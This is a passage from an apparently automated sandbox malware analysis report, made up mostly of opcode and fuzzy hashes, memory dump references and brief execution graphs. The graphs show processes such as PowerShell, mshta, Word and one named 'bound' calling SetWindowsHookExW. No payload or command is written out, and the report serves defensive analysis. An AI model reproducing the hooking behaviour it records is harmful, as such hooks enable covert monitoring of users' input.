                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aebde3f1232c2e38175831c80282f39692075820da9eb93581435806e0bc85ef
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72A1D563A0EBD18FE726ABAC58791E57FA0DF52224B0D41FBD0D88B0E3DD096805C752
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2063423190.00007FFD9A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8C0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9a8c0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a599c45c0d07a9e2491abeb985d28a6ea11068098e8857a7b4bf3b740e44008e
                                                                                                                                                                                                                                • Instruction ID: cb70700be8e94a78391727a69e271fb72df3b08913955f89675ed2442e5d11bc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a599c45c0d07a9e2491abeb985d28a6ea11068098e8857a7b4bf3b740e44008e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6231F471A1CB884FDB5C9B5C9C066A9BBF0FB99310F00426FE449D3292DA70B855CBC2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2061842955.00007FFD9A7AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A7AD000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9a7ad000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 3a4e0e975eccdc069d2a3cebe4473cfe4f90db36a678e75fe799ea2c34c82775
                                                                                                                                                                                                                                • Instruction ID: 84dc8cfde7aea7eb265373e5188c5f7fa236fd866385f3bfd3be2620aa3b99bd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a4e0e975eccdc069d2a3cebe4473cfe4f90db36a678e75fe799ea2c34c82775
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2413B7150DBC45FE75A8F3898569523FF0EF52324B1905EFD088CB1A3D625E84AC792
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2063423190.00007FFD9A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8C0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9a8c0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 42f32a37e772bc675462bcf5eaa5a2b152438d1bfc6ca3e4267f2be6b1a4fcf4
                                                                                                                                                                                                                                • Instruction ID: 948701ba5133e8c3ee23e9a359f4e56e9108d52c09b8e742dc8b756b572a7628
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42f32a37e772bc675462bcf5eaa5a2b152438d1bfc6ca3e4267f2be6b1a4fcf4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C01A73120CB0C4FD748EF0CE451AA6B3E0FB85324F10056EE58AC3695DA36E882CB42
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2063423190.00007FFD9A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8C0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9a8c0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: c1aac34ece969982ed16a71f1b653ed99bb7e92dc7640772b1bf24d94921ed5a
                                                                                                                                                                                                                                • Instruction ID: 58891f56a1350a1c947f3b84e9c78ff1982a4bf9b39568283f626d1eb2dc835c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1aac34ece969982ed16a71f1b653ed99bb7e92dc7640772b1bf24d94921ed5a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AF0B43661868C8FC706AF6C98284EA7BA0EF65205B0902BBD49DCB562DB255919CBC1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2064711335.00007FFD9A990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A990000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9a990000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e5b7d85068cd6226895dfb692a799b588ab2d4e48dfb24c1aaaf34d821c523e8
                                                                                                                                                                                                                                • Instruction ID: 0641d44628f7a897960b19beb32d574d80ee9225b6b7d30d46757ae2aa4093a9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5b7d85068cd6226895dfb692a799b588ab2d4e48dfb24c1aaaf34d821c523e8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02F09A32B0D5068FD76DEA6CA4569A873E0FF8532075100FAE05DC75A7CA25EC41C740
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2064711335.00007FFD9A990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A990000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9a990000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1069cc75ac1f0c6f75b14e4aa6e69229b0f394913d874eb908a2ff878e4363ca
                                                                                                                                                                                                                                • Instruction ID: f0ce31baf6a1cc270d47dae2d3a24c38875209aa843a5fff58f2ebbb76eccd86
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1069cc75ac1f0c6f75b14e4aa6e69229b0f394913d874eb908a2ff878e4363ca
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0F0B832B0D5449FEB69EB9CE4619A873E0FF89320B4000F6E01DCB5A7CA26AC80C740
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2063423190.00007FFD9A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8C0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9a8c0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: N_^$N_^$N_^$N_^$N_^$N_^
                                                                                                                                                                                                                                • API String ID: 0-4064032852
                                                                                                                                                                                                                                • Opcode ID: 87a179755f63a0fc5084f4fef7484bd987066439d702b26840e9ed8b23ab195b
                                                                                                                                                                                                                                • Instruction ID: 959f859aa4a4bfa4cf17ef0478b9524fb24aa3546e977afea7dc189dafca0915
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87a179755f63a0fc5084f4fef7484bd987066439d702b26840e9ed8b23ab195b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4318493E0E6D54FE76A5B685C790D53FE0AF22218B0A01F7D5E84F193FD1928078742
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2063423190.00007FFD9A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8C0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9a8c0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: N_^$N_^$N_^$N_^$N_^
                                                                                                                                                                                                                                • API String ID: 0-2528851458
                                                                                                                                                                                                                                • Opcode ID: 60b1253c909a0a8dc9e960e87a586ac04e2ab4ef66be134939296bc154318b40
                                                                                                                                                                                                                                • Instruction ID: e8988e95ec0859357e6ceba0402367d935bf902d2598f6ae7c506f3a6ab738d2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60b1253c909a0a8dc9e960e87a586ac04e2ab4ef66be134939296bc154318b40
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED4190A3B4E6C24FE72A57694C791957FA0EF62718F0A01F7C0D48F0A3E919284B8753
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2063423190.00007FFD9A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8C0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9a8c0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: N_^6$N_^<$N_^F$N_^I$N_^J
                                                                                                                                                                                                                                • API String ID: 0-4116931533
                                                                                                                                                                                                                                • Opcode ID: 8201c494a57edf1f917aa58f11816ee0842afcba423ac7bfc73ad6212f0e6841
                                                                                                                                                                                                                                • Instruction ID: 694e1381db686feef63ee40d02a6bf66d9ce44f006b9f467a38141a6caa5fe79
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8201c494a57edf1f917aa58f11816ee0842afcba423ac7bfc73ad6212f0e6841
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C21EFA7B084265E9302BBADBC209D86780DBD427A74801B3D368CB547DE14609B8682
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2063423190.00007FFD9A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8C0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9a8c0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: N_^$N_^$N_^$N_^
                                                                                                                                                                                                                                • API String ID: 0-3900292545
                                                                                                                                                                                                                                • Opcode ID: 4bae1b5e683b3a31117f6884b2a779f4d3129ebeef79c931eafcb091b11e9a4a
                                                                                                                                                                                                                                • Instruction ID: ca977aa7d7df7a1c4f4d4d72252bebfa43cc1756d7cf833496a3387e48fd8505
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4bae1b5e683b3a31117f6884b2a779f4d3129ebeef79c931eafcb091b11e9a4a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B116093E0E6D24BE7171778187D4D57FA09FA3328B5E02FBD0E90B0A3E90528079766
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000003.1843614431.00000174F1A80000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000174F1A80000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_3_174f1a80000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                • Instruction ID: 66e17030273b0506e9fbdb186ba4f9b3d945fe31bfc9bce09fa95e5b98f72a39
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E90021489A40656D51411950D4529C54506789260FD48480881A90184D54E06A65152

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:22.1%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                Total number of Nodes:9
                                                                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                                                                execution_graph 5717 7ffd9a8d2a8d 5718 7ffd9a8d2aa2 5717->5718 5721 7ffd9a8d2708 5718->5721 5720 7ffd9a8d2adb 5722 7ffd9a8d2711 SetWindowsHookExW 5721->5722 5724 7ffd9a8d2d11 5722->5724 5724->5720 5733 7ffd9a8d262f 5734 7ffd9a8d2643 SetWindowsHookExW 5733->5734 5736 7ffd9a8d2d11 5734->5736

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000002.4239154337.00007FFD9A8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8D0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_7ffd9a8d0000_bound.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: c2874ee869282b5af1d6991e38a5e610d0f6ae2360e798b59f1e472235d0588d
                                                                                                                                                                                                                                • Instruction ID: 738874f83900dbbc075c85720e488883aeb65fed14187d21dcc56318e3693f8e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2874ee869282b5af1d6991e38a5e610d0f6ae2360e798b59f1e472235d0588d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D611372B0CA694BDB14EFACEC55AE97BA0EF94336B04027BD159C3183DE64A40687D1

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000002.4239154337.00007FFD9A8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8D0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_7ffd9a8d0000_bound.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ed05240d489f33a01d87aa13e88a0c04789c0a8a4374170d1d208d89d25c0789
                                                                                                                                                                                                                                • Instruction ID: cfc4d8979dcb0050e956aa75e2e92c76eb47b5abc797b45949bf4ffc63196df3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed05240d489f33a01d87aa13e88a0c04789c0a8a4374170d1d208d89d25c0789
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A514D72E0DA894FDB69DFA898666F97BE0EF55320F0402BED05DC3193DE246806C781

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 640 7ffd9a8d2c38-7ffd9a8d2c3f 641 7ffd9a8d2c4a-7ffd9a8d2cbd 640->641 642 7ffd9a8d2c41-7ffd9a8d2c49 640->642 646 7ffd9a8d2d49-7ffd9a8d2d4d 641->646 647 7ffd9a8d2cc3-7ffd9a8d2cc8 641->647 642->641 648 7ffd9a8d2cd2-7ffd9a8d2d0f SetWindowsHookExW 646->648 649 7ffd9a8d2ccf-7ffd9a8d2cd0 647->649 650 7ffd9a8d2d17-7ffd9a8d2d48 648->650 651 7ffd9a8d2d11 648->651 649->648 651->650
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000002.4239154337.00007FFD9A8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8D0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_7ffd9a8d0000_bound.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: HookWindows
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2559412058-0
                                                                                                                                                                                                                                • Opcode ID: b6fa8b2841614623324bf2215eaa594672649bf3816dcfc85eea5374d47720aa
                                                                                                                                                                                                                                • Instruction ID: a290a1d32536617b8542e0a967c0a94e5a59fc73cb2f89e9b79b85b4cd522ce2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6fa8b2841614623324bf2215eaa594672649bf3816dcfc85eea5374d47720aa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9310631A1CA4D8FDB58DF689816AF97BE1EB99321F00427ED01DD3296DE64A8028781

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 654 7ffd9a8d2708-7ffd9a8d2cbd 659 7ffd9a8d2d49-7ffd9a8d2d4d 654->659 660 7ffd9a8d2cc3-7ffd9a8d2cc8 654->660 661 7ffd9a8d2cd2-7ffd9a8d2d0f SetWindowsHookExW 659->661 662 7ffd9a8d2ccf-7ffd9a8d2cd0 660->662 663 7ffd9a8d2d17-7ffd9a8d2d48 661->663 664 7ffd9a8d2d11 661->664 662->661 664->663
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000002.4239154337.00007FFD9A8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8D0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_7ffd9a8d0000_bound.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: HookWindows
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2559412058-0
                                                                                                                                                                                                                                • Opcode ID: 6deb19496c57eff68510091561f5f6704647658f77ad215a3ce670633516d81a
                                                                                                                                                                                                                                • Instruction ID: 6884cc26c3e58af9ccd5db9fc7c7267828e2663db34ca9bfd25b33c5e62ba094
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6deb19496c57eff68510091561f5f6704647658f77ad215a3ce670633516d81a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6312831A0CA4C4FEB58EF6C98566F97BE1EB99321F10427ED05DD3292DE65A802C7C1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000002F.00000002.1973572634.00007FFD9A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_47_2_7ffd9a8b0000_word.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 43a45fdde9497d787e077bcbfc8fd67fb2eb26ff6de22bc21de0f2a63e1c7e60
                                                                                                                                                                                                                                • Instruction ID: 81ab5df9b6371111785e21f5c55faaa900a36d93122b70cae943cba0e4c6e127
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43a45fdde9497d787e077bcbfc8fd67fb2eb26ff6de22bc21de0f2a63e1c7e60
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F42BA61B28A494FE798FB7C8875AB977E2FF98304F540579E44DC32DADE286C018781
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000002F.00000002.1973572634.00007FFD9A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_47_2_7ffd9a8b0000_word.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8c0c6e77741f319c84cd26efa2ac353d5a655f08e4789b758a78aedcba17f272
                                                                                                                                                                                                                                • Instruction ID: 4f11b148534b72df2ba1484ca4c3859f5858a07b8c802a1fe66dce623fbd304d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c0c6e77741f319c84cd26efa2ac353d5a655f08e4789b758a78aedcba17f272
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E051E521B1DAC60FE75AA77848656B53FE2DF86220B0901FBD48DC71EBDD1C6C468352
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000002F.00000002.1973572634.00007FFD9A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_47_2_7ffd9a8b0000_word.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 2b3044853c62e5c6f3f29e62d73c184eab7c30b3424b8fa8964f5bc9807ca6e0
                                                                                                                                                                                                                                • Instruction ID: 40333c9e632b887093884a524afdd24d69f0d3a677239f1f430917ba41620454
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b3044853c62e5c6f3f29e62d73c184eab7c30b3424b8fa8964f5bc9807ca6e0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4941E662E0D64A4FE745EFB89CB14EE7B70EF85224B4401B7D099DB0E7DE2828468391
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000002F.00000002.1973572634.00007FFD9A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_47_2_7ffd9a8b0000_word.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: bc94b2d4e5114e5d635ca4324572de803d9b0803944eccef7338607de95c686c
                                                                                                                                                                                                                                • Instruction ID: c0c09aa00417a10e71b427a9e9c4373466d9bcb90ef83a41758a0d4a80172242
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc94b2d4e5114e5d635ca4324572de803d9b0803944eccef7338607de95c686c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF31F862E0864A4FEB95EFA88C711EDBBB1EF89210F4401B7D059EB1E7DE3428058780
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000002F.00000002.1973572634.00007FFD9A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_47_2_7ffd9a8b0000_word.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: af082cd7ef67f1656b70673c13f57facf0fe354bd3ecbe2961b149582dd3d7b6
                                                                                                                                                                                                                                • Instruction ID: 70c29fb8d41b6dd926bda56586882b34af37600ea8f06e9b8debd4e1eb704e2c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: af082cd7ef67f1656b70673c13f57facf0fe354bd3ecbe2961b149582dd3d7b6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0418171E18A098FDB48EFA88C756ADB7B2FF98314F500579D019D72CBDE38A8058751
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000002F.00000002.1973572634.00007FFD9A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_47_2_7ffd9a8b0000_word.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a2e2d0135a7cb9cfdc700f23b3b2953d565e900a76b20d5e0169a43cdfff761a
                                                                                                                                                                                                                                • Instruction ID: 4f94ccee4ad860a18b6f8623ad2aab39318923019256de60fce5e2875343eef9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2e2d0135a7cb9cfdc700f23b3b2953d565e900a76b20d5e0169a43cdfff761a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0319A21B1C9484FD788EB2C98657B8B6C2EF9C315F4405BEE04EC32DBDD68AC418741
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000002F.00000002.1973572634.00007FFD9A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_47_2_7ffd9a8b0000_word.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 226030a18aab20197bcb3c41fac6f8c3b53c1ed98d607c228142d72ba2b2ea31
                                                                                                                                                                                                                                • Instruction ID: 01ab33f1cc4e46dd7ef7508b7a886b0084dacdced28d75a2a3cf1393667432e3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 226030a18aab20197bcb3c41fac6f8c3b53c1ed98d607c228142d72ba2b2ea31
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43318860B1954D8FD789EF288CB59A97B72AF8831879044A9D80CC73DFDE3869148761
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000002F.00000002.1973572634.00007FFD9A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_47_2_7ffd9a8b0000_word.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d1ba364e33152dd51346399e3eb73a2dc81835c1491c903db299fcde19f69130
                                                                                                                                                                                                                                • Instruction ID: 0a744fffa5de11fa1079fcbced3edcf0e48198f33c69e7594f4cde1aa5be2e7e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1ba364e33152dd51346399e3eb73a2dc81835c1491c903db299fcde19f69130
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D215361F149094BFB44BBBC5C6A6FC72D2EF98615F100176E11DC32DBDE28A8414381
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000002F.00000002.1973572634.00007FFD9A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_47_2_7ffd9a8b0000_word.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8d22be257aec1fef2aff7e335eb6026b2bb25983b7294a3e9eec1b7a30b35344
                                                                                                                                                                                                                                • Instruction ID: bf0c70261ba3e64c01ac9d60f555d45e3aa3dfc0707eee9b8d205f298eecfd7b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d22be257aec1fef2aff7e335eb6026b2bb25983b7294a3e9eec1b7a30b35344
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B012611A1C7854FE796BB3C1C654767FF18F86260B0805BBE888CB1DBED28A94583C2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000002F.00000002.1973572634.00007FFD9A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
